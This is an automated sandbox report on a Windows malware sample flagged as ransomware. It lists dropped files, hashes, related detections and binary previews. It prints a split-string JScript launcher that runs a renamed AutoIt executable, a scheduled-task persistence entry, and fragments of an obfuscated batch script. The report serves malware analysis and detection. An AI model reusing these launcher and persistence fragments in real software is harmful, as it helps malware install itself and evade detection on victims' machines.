NameIPActiveMaliciousAntivirus DetectionReputation
JzyWtlVaDZyw.JzyWtlVaDZyw
unknown
unknowntrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://www.autoitscript.com/autoit3/Jfile.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000003.1746303015.000000000420B000.00000004.00000800.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000000.1737134126.0000000000C68000.00000002.00000001.01000000.00000005.sdmp, MindTechPro360.pif, 0000000F.00000002.2941852709.0000000000758000.00000002.00000001.01000000.00000008.sdmp, Halloween.0.dr, nsb6504.tmp.0.dr, Shopzilla.pif.1.dr, MindTechPro360.pif.10.drfalse
    • Avira URL Cloud: safe
    unknown
    http://nsis.sf.net/NSIS_ErrorErrorfile.exefalse
    • URL Reputation: safe
    unknown
    http://www.autoitscript.com/autoit3/0file.exe, 00000000.00000002.1901869005.000000000292E000.00000004.00000020.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000003.1746303015.000000000420B000.00000004.00000800.00020000.00000000.sdmp, Shopzilla.pif, 0000000A.00000002.2943481145.0000000003B16000.00000004.00000020.00020000.00000000.sdmp, Essential.0.dr, nsb6504.tmp.0.dr, Shopzilla.pif.1.dr, MindTechPro360.pif.10.drfalse
    • Avira URL Cloud: safe
    unknown
    No contacted IP infos
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1458478
    Start date and time:2024-06-17 17:57:07 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 7m 12s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:20
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:file.exe
    Detection:MAL
    Classification:mal84.rans.evad.winEXE@28/49@1/0
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 98
    • Number of non-executed functions: 296
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • VT rate limit hit for: file.exe
    TimeTypeDescription
    11:58:42API Interceptor3527x Sleep call for process: Shopzilla.pif modified
    11:58:46API Interceptor2784x Sleep call for process: MindTechPro360.pif modified
    16:58:07Task SchedulerRun new task: MindTechPro360 path: wscript s>//B "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js"
    No context
    No context
    No context
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pifSetup.exeGet hashmaliciousVidarBrowse
      75MwheiQ7I.exeGet hashmaliciousAmadeyBrowse
        file.exeGet hashmaliciousUnknownBrowse
          file.exeGet hashmaliciousUnknownBrowse
            package1107.png.lnkGet hashmaliciousXWormBrowse
              ljwIPDSwFi.exeGet hashmaliciousDarkGate, MailPassView, VidarBrowse
                file.exeGet hashmaliciousUnknownBrowse
                  file.exeGet hashmaliciousUnknownBrowse
                    P8KA32mz7j.exeGet hashmaliciousRedLineBrowse
                      6wmPebfmfG.exeGet hashmaliciousUnknownBrowse
                        C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pifSetup.exeGet hashmaliciousVidarBrowse
                          75MwheiQ7I.exeGet hashmaliciousAmadeyBrowse
                            file.exeGet hashmaliciousUnknownBrowse
                              file.exeGet hashmaliciousUnknownBrowse
                                package1107.png.lnkGet hashmaliciousXWormBrowse
                                  ljwIPDSwFi.exeGet hashmaliciousDarkGate, MailPassView, VidarBrowse
                                    file.exeGet hashmaliciousUnknownBrowse
                                      file.exeGet hashmaliciousUnknownBrowse
                                        P8KA32mz7j.exeGet hashmaliciousRedLineBrowse
                                          6wmPebfmfG.exeGet hashmaliciousUnknownBrowse
                                            Process:C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1870510
                                            Entropy (8bit):7.999909718535495
                                            Encrypted:true
                                            SSDEEP:49152:7uottM3/K2AQPfHh/L21jiKo2FjI9M6+iCKwNMPv:1twXAo/hz212KoJu/iIsv
                                            MD5:0F0B22E9E46035CD5603184321DA09B3
                                            SHA1:19306DBE626F4C3276F2B918B7095D548FBF74C5
                                            SHA-256:5D7833100FF695C322B4DE2E6DA0E467AF2EA2755BB22D7E38D5AE59DEF8070C
                                            SHA-512:35528880E916D2414AD0F1AF944757A3370D043B36ADF12E45E0AEF2CA6E3EBC18151B31791DD34800BDF9E8A9A47668231A68A71A2E2841FBC640C144BC6F69
                                            Malicious:true
                                            Preview:....~....u.,F......j.. ....B4q.......b^..{.o..C..f.>....j.+....Y@.Q.oQN..mp..x....:#.,.4.#.7..`..z.|+...3.8...AK.=q.5y.j.\..YV..D5v.:.m."....+y].........:..`....J.cOC.'.n.0..f...mK....h.....?..df..J....U..}..W.zl......1.3..?X....g?;.Y......%..fa~o.S..d..%.....);0.Z.7.}}.P..(`.lE7...dr.M.]..G.#...g..8<...>[.[.......eR./..om..L.1ef..>.D4.......).L... .....v..*.J .l...W.T.I..R.&..U...Vg.c"&.o.P..Rr....u.+.~.e..c.E....x.&^h.....-......;..g....Ze....+t*N@..|.Oc\..V...W_.B..A.U.....?.z.vy.h.q?..|....h ..,.jm<...w.R..."R...E.....<.........e......)..t.c.QwmT....Q..!...3rE.V.z...?0.rmK.*.FN[.x......i\/.....wtIc.]....p....X~f.. '2.z...?.#.j..:..Z....X=4.Ela.W(.WM...T....l.0.B....Ee.EE.......#5F..D!..~.u....Lb...;.F....H.5.d.e...#|..|....~'.m...7.SD..H..~..}G...k(..Q&..G.#".{se.~...~.)7I./7u..F..5w.,&..9.....y.z...T3...ok..]..../U.R..WE.e.D...eKp..r..N....e!.H..#)(T..._0|.^TP3.1..9-sC..<..mD.../.<"...b..%.WEZlS..5....%Q|.j...?$.....)...M..R8
                                            Process:C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):200
                                            Entropy (8bit):4.881647496788254
                                            Encrypted:false
                                            SSDEEP:6:RiJuOybJHonwWDKaJkDvxosQBDNvnnVVwWDKaJkDvxosQBD4:YJeQjWaexos8DZnnvWaexos8D4
                                            MD5:2F882A56198FF5CEF671FB7C52AFE739
                                            SHA1:69F562727EBBBDD17E582A035E08AAF7AD76FB06
                                            SHA-256:6A89D34D849CD4957A32A9E30D01A14411DCCB06D2F51AA887711B82193323D0
                                            SHA-512:DEFB674290010BFC5AA143F9C9EB03DE8F3629C0B09821B5B0CA22C21EC8041E81BC586F5CE7EB089ED98C57D2932AFDC24A941A39AD7C49644F38F226A91CC1
                                            Malicious:true
                                            Preview:new ActiveXObject("Wscript.Sh" + "ell").Exec("\"C:\\Users\\user\\AppData\\Local\\TechMind360 Innovations Co\\MindTechPro360.pif\" \"C:\\Users\\user\\AppData\\Local\\TechMind360 Innovations Co\\L\"")
                                            Process:C:\Users\user\AppData\Local\Temp\812297\Shopzilla.pif
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):937776
                                            Entropy (8bit):6.777413141364669
                                            Encrypted:false
                                            SSDEEP:12288:FJV3REMvnCG22lhtjVoAYxQl+u13a/sVyaVeK56ORMkkOlPlNKlga4Umff2lRO:F3hEW3hlVodGl+gUKrMkzXa4P6RO
                                            MD5:B06E67F9767E5023892D9698703AD098
                                            SHA1:ACC07666F4C1D4461D3E1C263CF6A194A8DD1544
                                            SHA-256:8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
                                            SHA-512:7972C78ACEBDD86C57D879C12CB407120155A24A52FDA23DDB7D9E181DD59DAC1EB74F327817ADBC364D37C8DC704F8236F3539B4D3EE5A022814924A1616943
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: Setup.exe, Detection: malicious, Browse
                                            • Filename: 75MwheiQ7I.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: package1107.png.lnk, Detection: malicious, Browse
                                            • Filename: ljwIPDSwFi.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: P8KA32mz7j.exe, Detection: malicious, Browse
                                            • Filename: 6wmPebfmfG.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...y..U..........".................*.............@.................................w.....@...@.......@.....................L...|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:modified
                                            Size (bytes):937776
                                            Entropy (8bit):6.777413141364669
                                            Encrypted:false
                                            SSDEEP:12288:FJV3REMvnCG22lhtjVoAYxQl+u13a/sVyaVeK56ORMkkOlPlNKlga4Umff2lRO:F3hEW3hlVodGl+gUKrMkzXa4P6RO
                                            MD5:B06E67F9767E5023892D9698703AD098
                                            SHA1:ACC07666F4C1D4461D3E1C263CF6A194A8DD1544
                                            SHA-256:8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
                                            SHA-512:7972C78ACEBDD86C57D879C12CB407120155A24A52FDA23DDB7D9E181DD59DAC1EB74F327817ADBC364D37C8DC704F8236F3539B4D3EE5A022814924A1616943
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: Setup.exe, Detection: malicious, Browse
                                            • Filename: 75MwheiQ7I.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: package1107.png.lnk, Detection: malicious, Browse
                                            • Filename: ljwIPDSwFi.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: P8KA32mz7j.exe, Detection: malicious, Browse
                                            • Filename: 6wmPebfmfG.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...y..U..........".................*.............@.................................w.....@...@.......@.....................L...|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1870510
                                            Entropy (8bit):7.999909718535495
                                            Encrypted:true
                                            SSDEEP:49152:7uottM3/K2AQPfHh/L21jiKo2FjI9M6+iCKwNMPv:1twXAo/hz212KoJu/iIsv
                                            MD5:0F0B22E9E46035CD5603184321DA09B3
                                            SHA1:19306DBE626F4C3276F2B918B7095D548FBF74C5
                                            SHA-256:5D7833100FF695C322B4DE2E6DA0E467AF2EA2755BB22D7E38D5AE59DEF8070C
                                            SHA-512:35528880E916D2414AD0F1AF944757A3370D043B36ADF12E45E0AEF2CA6E3EBC18151B31791DD34800BDF9E8A9A47668231A68A71A2E2841FBC640C144BC6F69
                                            Malicious:true
                                            Preview:....~....u.,F......j.. ....B4q.......b^..{.o..C..f.>....j.+....Y@.Q.oQN..mp..x....:#.,.4.#.7..`..z.|+...3.8...AK.=q.5y.j.\..YV..D5v.:.m."....+y].........:..`....J.cOC.'.n.0..f...mK....h.....?..df..J....U..}..W.zl......1.3..?X....g?;.Y......%..fa~o.S..d..%.....);0.Z.7.}}.P..(`.lE7...dr.M.]..G.#...g..8<...>[.[.......eR./..om..L.1ef..>.D4.......).L... .....v..*.J .l...W.T.I..R.&..U...Vg.c"&.o.P..Rr....u.+.~.e..c.E....x.&^h.....-......;..g....Ze....+t*N@..|.Oc\..V...W_.B..A.U.....?.z.vy.h.q?..|....h ..,.jm<...w.R..."R...E.....<.........e......)..t.c.QwmT....Q..!...3rE.V.z...?0.rmK.*.FN[.x......i\/.....wtIc.]....p....X~f.. '2.z...?.#.j..:..Z....X=4.Ela.W(.WM...T....l.0.B....Ee.EE.......#5F..D!..~.u....Lb...;.F....H.5.d.e...#|..|....~'.m...7.SD..H..~..}G...k(..Q&..G.#".{se.~...~.)7I./7u..F..5w.,&..9.....y.z...T3...ok..]..../U.R..WE.e.D...eKp..r..N....e!.H..#)(T..._0|.^TP3.1..9-sC..<..mD.../.<"...b..%.WEZlS..5....%Q|.j...?$.....)...M..R8
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):175104
                                            Entropy (8bit):7.999038609788727
                                            Encrypted:true
                                            SSDEEP:3072:1z5xKQwY8VkAdwY9MrIC/niZk/4O99tH//SDgGXI3iYkwBvUg52ZqVUSTfYq:hKQMV/wY9e98krtf/m9I3iSNB5O4USZ
                                            MD5:09E2FD2D8BC6F547CEDFEB5A6479159A
                                            SHA1:6E2C74E6EB88CC077711EDF6DA915E8DBA0924E6
                                            SHA-256:38565848421A4E6D46FA86322353BC97DC6D95C3851F844A4DF846F09D0F12FE
                                            SHA-512:1CBED330E7C10EEFD6A67CE6168726AC728FF59B49666DC7F24BF69F2778C60211E2E3E3C95B0AF6AEFC5CA8E5FC25B10E59B2CE672315648F55091CBEAB3553
                                            Malicious:true
                                            Preview:.y$U.3B.5...6!...?R........|........'..8-.T..Gv.....t[2......<.H..4..r....@..%..z.......?U&.w...|..$..d.J.cByj~..U.!p.....\..B!.E.....j./*...*.K<.......d.].K..Uh.+e?z....e6YA0.E,u.4[..w....q..../.....js]...)h7...}.........D..@.^7.Q.4|I.......5i..#8n..N}....@.vZ.UI.......X.o.7".w/}..g|.a.~_V.Y`.....x.PB2.X.e.xy*n...W..+........y........yd'....J....~...l{..Z....2z.tg....I.c!d......V...l.lV>.X.a.......V...`.o.q.......`#.&.Cle5.,..K..s\...I...dl^....."{."..x#...o.x..-A....Tt...._.U..>0f.C...5v..~.s.R..a.A.#.....%7.@......K......1~.T..H.......g....=.p0'...oq+.&Xi...$.....G@K...?..e6.J.[.,...a.+.z...h...L..hG...2...e.{\.13...Z..M.Vz...)..>T........>..oi)4....6..^A2G.pcWp.....N..+M.PmT....".c...e......z4.[.....Y3[...SZ..%.K...&.AQ.......Q......A.dZ....H..G...A#.9.:...6.^.F..u{.e..Mq.8..."{.......$..D.:C.SH....k....G....f.h..QoG...J....0.mQg.{.....4=..*..j.GS.hW.....'....6DjF.Eb[}.f.......T.........2...3$...b..F..S.DU.^5bwb..L...........
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):13312
                                            Entropy (8bit):6.513475428211949
                                            Encrypted:false
                                            SSDEEP:384:3lwxFwfydtw4QGE2v9fwz3AwstdBx3auBxw6eY:ViFwfGW43E2lfwMwstd7FBZx
                                            MD5:21637A923846FFA2C94BC138D834E72C
                                            SHA1:C3BF7CF1359FA0AC0491E84ACF343511BD7450DB
                                            SHA-256:525A84A7D19A08132883B275B9CF4DF2C5730C0935900F4C2D50FB4C224BE7D3
                                            SHA-512:A185C99150B6A1FE7B1AFEE6196B00332387F6870DFBA7BF094E1B90287FBACAC967045302B668520F3ADA43AB777834BD9BA8705500CB3013E213926A8A9F89
                                            Malicious:false
                                            Preview:...t<..............4..IL..u.....E...F.j.h.....F.P.........F..U..M.G.}.E.@.E....U.....IL..=.QL.....IL......;.s$f.A.......Y..a$.f.A%...Y8.Y4..@.M...F.u.M......j.[3..}...............5.IL..u.>.t.9.t...F....F......F....u.j.X...G........P..d.I..E...tL..tHP....I...t=.M..%.......u...F..@.....u...F....F.j.h.....F.P.........F.....F..@.F....@bL...t.....X.G.=....]......3......j......Y.j.h..K..n...3.].u....u..P......}.....................;5.QL........................IL...D8....u....... ..jV.....Y.e......IL..D8..t..u..u.V.^.......................... .....}..E.............(.u..}.V.Y...Y.................J...........U.......?...P.K.3.E...D.....E..M.V3...8...W3...0.....@...9u.u.3........u......!0.[...................................(...S....IL...$....\.$.......t....u+.E....u.....!0....................8....D.. t.j.j.j.P.p>.......8........Y....P.....(.....$.......IL..D.....2....!...3.@l9...........P..(........<.....$.......IL..4.....I.........9.<...t.............I...0...3.!
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):168960
                                            Entropy (8bit):7.99894390583128
                                            Encrypted:true
                                            SSDEEP:3072:xjpeF0dzBma2csog356vFWFwCjq0gOwVVaVmty74jT/savMH+vvRAPryOeOUJN8k:xjpS452bog3EI2CWROesVmt3T/VvMevt
                                            MD5:2140E91DD200A126F7C6B11DC54538EB
                                            SHA1:0CC5483090145F8A5DEA2E03837A42D54C0B82A5
                                            SHA-256:1E9F4820BDA924B37EFD9D56F9129A28292D37E28786E07A9D869376A092B64B
                                            SHA-512:55D0DC89662CFF04821CBCA9B0C8468A261A39299E586C21F0A33665ADF73ACA7EE0A14E5CD893F149FB06C065225A54A4119A504A81BE5EFAC3632D426FD923
                                            Malicious:true
                                            Preview:Z<].GmQ...g.......`..R..;e....:O.d...$:-.O.......L..o..>*....J4..m."..Q.!s.....5. .l.pn....O.....7#HEm.+..y.[#97.J.g.^a.Gfa[.Z....@...,G.....L..S.$-'......br.,...e..5....tv.B.mCL.3...<q.q@SN...WK...mIqQ.~..l/..Ymn.{*..X._..[..&.>..'.....E..k...}.t.|).2YJ..h>6....@.Sh%.X...,.M.;.....o..Z..@."z...y.%L5l..@...v.F....(kL.......$...!^m....!LV.......u.(...._ ...."..48.$....v.`.'.pc..l.=...B..]........g.....<.8./.. B..`.....u.S.......q....t..<..i...~'W... K....aL.z){&.AYh%. .....?.....<..GN...Z....~7..+........d.......).V.u..a.Yk.1V..u...s...k;Z9..b../e.oLVd.,.1\..*.ly..2<.. ..9....,.P.%...%...^.~!.?Mg%G....|....p(...A#..q...$r..-....7c.........7.*.FO}\n$.!h..$y...-!....c..[...`;.........V..}\S`...W.jA..O.@(.x9..+...R.C.."....E.Z..m..n...C.9....Wd.....A....=7.5O.*.A.......g.......QR....qN..."..3.......L.LiODB.L..../r..d9.d.&.;".M....}`..>EK.N.....'..{)...O.g?.p...v..s..P.G.b...Iw..M...U...Y..4C...x....8R..h`.M..@..2.c...YK.{._.m~\I...
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):53248
                                            Entropy (8bit):6.664047309777273
                                            Encrypted:false
                                            SSDEEP:1536:3itgXKUvl8UTcyzJW784Lle+1X/tcATs3Q:SuXtvrhzU78Gle6Ptc+s3Q
                                            MD5:3E4BDFEC2576D42D0FC8CCC2FC881357
                                            SHA1:22397318970F53716FC57A8E016CC39178E9F10A
                                            SHA-256:1D514F8D3E64893E12FD4CFC1A49646F19FE093677298964705495AB7E62D60F
                                            SHA-512:2D00F8C39227F663F7C24370035747053E8F6C73353C35EE70F98D745EB36E3ED08358F05AC9DFC840A4D6B94583330A09741E36F6D7EC9F5B4C73C4362A36D6
                                            Malicious:false
                                            Preview:I...^]...U..f.E...dSV3.Wf...u..E..@...t...S....f...uP.E.SSj..@.PSS....I..E...3..j.Z.........Q.Q...YW..3.Vj..u.PP..V..x.I.V......Y.Qf...u..E..p.V..x.I.V......I..3f..Hu-.u..}.j(.E.P.v..E.P......H.I...t..E.P..x.I..._^..[..]...U..f.E...PS3.Vf...u..E..@...t...S....f...uT.E.WSS.@.j...PSS....I..E...3..j.Z.........Q.v-..YW..3.Vj..u.PP..V..x.I.V....-..Y_.Hf...u..E..@..0V..x.I.V......I..(f..Hu".E..M.j(Q.p...H.I...t..E.P..x.I...^..[..]...U..VW.}.W.2...W....\.I.j.Xf....w._^]...U..S.]..u.............M.f.......f;.......VW.u.....I...3.j.Z.F..........Q.,..Y.u...W....I.3.3.f..w..f9.tA..f.8:t.F..wf9.u....G.h.K...pP..4.I...u.......3.Wf..w.Z....M.f..W.,..Y_^[]...U..M.V3...f91t,SWj,[j..._9u.t.f9.u.f.8..f98u.f..B..Qf90u._[^]...U..E..H...t..u....u..u..u..u.Q.P.....@..]...U..E..H...t..u....u..u.Q.P.....@..]...U..E..H...t..u...Q.P.....@..]...U.....E...\SVW..uQ.E..tA.E..x..u..u ..t.V..\.I.j.Xf...E..@..F.3..~.........t.........j.........`....U.3.9z...M....M.k...B..I..L$(.\$$;L.0u...t$..........t
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:ASCII text, with very long lines (1797), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):29388
                                            Entropy (8bit):5.02051729482519
                                            Encrypted:false
                                            SSDEEP:768:zoMoPn45zXylsJlFD7B8DazeeD3IXZJdSrQRLPX932:cMoP4UlelJnqZJdSW32
                                            MD5:B2CFAF4AAC73F87113653D5EA8757631
                                            SHA1:0E5585A9B6A7A04E37CEDC1CDA6827F81D3F8687
                                            SHA-256:EC2838EC67B6B6B4E46D2D9450E89FA5C8C268876D09ED40CC9DF2C57CA4F157
                                            SHA-512:A62C9C31D720B2D710C799732A0F8BC45EB5233F38A0ADD244623294B09EC8335FE815B24FFDF03A984D522E5E623416948C7D2B511D8F3A49CE140E107C2068
                                            Malicious:false
                                            Preview:Set Reflections=m..TXLRaise ..aefzPoverty Thong ..XwXnSick Previously Eastern Activities Robin ..IsaAllah Sister ..QtIcFilename ..Set Discover=R..ppKEarnings Former Eco Kg Penny ..bjsQUrl Villa Minneapolis Assembled Naples Wound ..gCzSFact Lung York Newer Copying Drinking Expedia Lb ..dhEngaging Apartment ..ApaCDist Baghdad Iraqi Automation Russia ..GATransferred Celebrate Cambodia ..Set Hood=e..XIjhAcoustic Example Kijiji Orchestra Productive Guidance Restoration Marvel Broadcast ..tlRMarketing Digest Atomic Tue ..qHQlCoast Call ..NtVSBoob Msgstr Jump Var Mozilla Sri Functioning Gardening Indiana ..xVVaries Ee Associated Account Productions Therapy Reasonable Hindu ..dpEssential Inputs ..IqbMaintained Cartoon ..hTPodcast Critics Ment Indeed Memory Melissa ..Set Ieee=d..kRJGotta Ag Buffalo Logan Stronger Donate Encouraged ..gxPLOs Complex Garcia Proceeding ..wpcwCnn Webmaster Pretty Restriction Replaced Singer Wallace ..MYAuthorization Combo Hide ..jZEH Souls Resulted Reasoning Bright
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:ASCII text, with very long lines (1797), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):29388
                                            Entropy (8bit):5.02051729482519
                                            Encrypted:false
                                            SSDEEP:768:zoMoPn45zXylsJlFD7B8DazeeD3IXZJdSrQRLPX932:cMoP4UlelJnqZJdSW32
                                            MD5:B2CFAF4AAC73F87113653D5EA8757631
                                            SHA1:0E5585A9B6A7A04E37CEDC1CDA6827F81D3F8687
                                            SHA-256:EC2838EC67B6B6B4E46D2D9450E89FA5C8C268876D09ED40CC9DF2C57CA4F157
                                            SHA-512:A62C9C31D720B2D710C799732A0F8BC45EB5233F38A0ADD244623294B09EC8335FE815B24FFDF03A984D522E5E623416948C7D2B511D8F3A49CE140E107C2068
                                            Malicious:false
                                            Preview:Set Reflections=m..TXLRaise ..aefzPoverty Thong ..XwXnSick Previously Eastern Activities Robin ..IsaAllah Sister ..QtIcFilename ..Set Discover=R..ppKEarnings Former Eco Kg Penny ..bjsQUrl Villa Minneapolis Assembled Naples Wound ..gCzSFact Lung York Newer Copying Drinking Expedia Lb ..dhEngaging Apartment ..ApaCDist Baghdad Iraqi Automation Russia ..GATransferred Celebrate Cambodia ..Set Hood=e..XIjhAcoustic Example Kijiji Orchestra Productive Guidance Restoration Marvel Broadcast ..tlRMarketing Digest Atomic Tue ..qHQlCoast Call ..NtVSBoob Msgstr Jump Var Mozilla Sri Functioning Gardening Indiana ..xVVaries Ee Associated Account Productions Therapy Reasonable Hindu ..dpEssential Inputs ..IqbMaintained Cartoon ..hTPodcast Critics Ment Indeed Memory Melissa ..Set Ieee=d..kRJGotta Ag Buffalo Logan Stronger Donate Encouraged ..gxPLOs Complex Garcia Proceeding ..wpcwCnn Webmaster Pretty Restriction Replaced Singer Wallace ..MYAuthorization Combo Hide ..jZEH Souls Resulted Reasoning Bright
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):198656
                                            Entropy (8bit):7.999242026241879
                                            Encrypted:true
                                            SSDEEP:6144:GDfcquc0KXowzAptg0farVFjuI2WowwIEkWQzVyYR:cSwz30yCI2RYZyYR
                                            MD5:5F3CFBF4470EB496F8024C3BBD3DD6E8
                                            SHA1:3C9005A1C835997AC4563B02B28893258FA44CAD
                                            SHA-256:2A3DA06C81D2C53D1DAEC0A8A5AA1C64CEF52D4FF533C794E02E89D8ADA2F082
                                            SHA-512:4E119F54491513AAB186BA1839D8A25E4234B17310508B1AD09CFAF0C92E0C68A95B697F49D70B0F1DE6562774A6BD7A7F89C827F157C99E71D856A2BB81E8FD
                                            Malicious:true
                                            Preview:.*..=..q...Pp.g..=.e..<|........]n#..*5....v....I..&.....o<e.M... 2C....2.......4.5%......Q....:{....E.q..Z3.fr...e.Rq5@.\...&....{.G.y.v.[..".}.[.....D.|C...?-.F.....b.}J..97.KUG D........hh}0*.t.zI.b..P.h.....".a.N..L..QB.j..*C.vf.}c..c.......t..a...9....h..9.."..g.g.D..?<~b.a....,..t.......B...(.4E.:Rx*..E..|......U.3........o.i.O.h.V4:..z'F.[k.3.......%....o.....T..Z..0>..'.M......_......t..rF_...|...6C".....C.K$.d{....i.a..F.^mf...Q./.<...-.]W.o.Hirh$.a..~....r.T.:.............(..PJ6|.*qb._./.E.:....KM..3JV..<.AV....K..6..;....e..*.g..aQ...(..1..m.+.Sn.....-.q....Y.:BD....*.b...!H.'Y.....!..F...OS.z......G.L.g....6t.H\...*.d.gWv...l..|4.J.BW#..h......Qo..D.LJG.>._...&.....{W <k]>!_..=......0{.WGRq.M......l......]6n..za....eS.6}.:p/..^....NQ..n)......\>@M.F..*.l..e.G)J.......D&.T.ac..-....D..+.B*_|...T...5#R.zT..9G.~..c....+S......@...........I7.9H...`.7b.|w'..'..N^..(?.S.+'*....I.M]....}*..~fV.y...2.....4..._.mu:.Kh....z<.....S.T.
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):51200
                                            Entropy (8bit):7.9961421393381
                                            Encrypted:true
                                            SSDEEP:768:oARRwm8z64/B2iay3eIAiS2yOu2kZN7qmgDXBF7PNsJ019kk/pH7cDkJA:pCm8f27y3942dkZN7qmYBxPNsJc1hQkG
                                            MD5:EA6F73223534C1E0F965521FD8379B6E
                                            SHA1:309DF2C205956373BE3D46F09C9806AC77AD1BC1
                                            SHA-256:BFEC273A032E4FB30681CAEF31B7EA466165518E7F5CB917A159F1B1B88D60D8
                                            SHA-512:2843CD24B337D907D220913E701278764CDD17BDBB8DFB47EE0EBADEF9075F502160E9EB39105C133DFD69EE556C382AD00653D3F565D97B2563E1921DD83AEA
                                            Malicious:true
